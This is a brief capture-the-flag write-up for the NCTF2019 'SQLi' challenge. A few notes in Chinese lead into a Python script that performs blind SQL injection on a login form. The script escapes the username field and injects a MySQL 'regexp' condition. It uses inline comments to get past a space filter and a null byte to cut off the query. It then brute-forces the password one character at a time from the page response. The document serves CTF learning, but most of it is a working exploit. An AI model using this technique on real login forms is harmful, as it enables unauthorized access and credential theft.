[NCTF2019]SQLi
- robots.txt有个hint.txt
- hint.txt说只要密码对就给flag
- Mysql的正则表达式 regexp
import requests
import string
url = "http://5f80822e-bbf0-4050-ba1b-6fc9c1783ad4.node3.buuoj.cn/"
str_list = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_"
password= ""
while(True):
for j in str_list :
data = {
"username" : "\",
"passwd" : '||/*1*/passwd/*2*/regexp/*3*/"^%s";%s' % (password+j,chr(0))
}
r = requests.post(url,data=data)
if("welcome" in r.text):
password += j
print(password)
break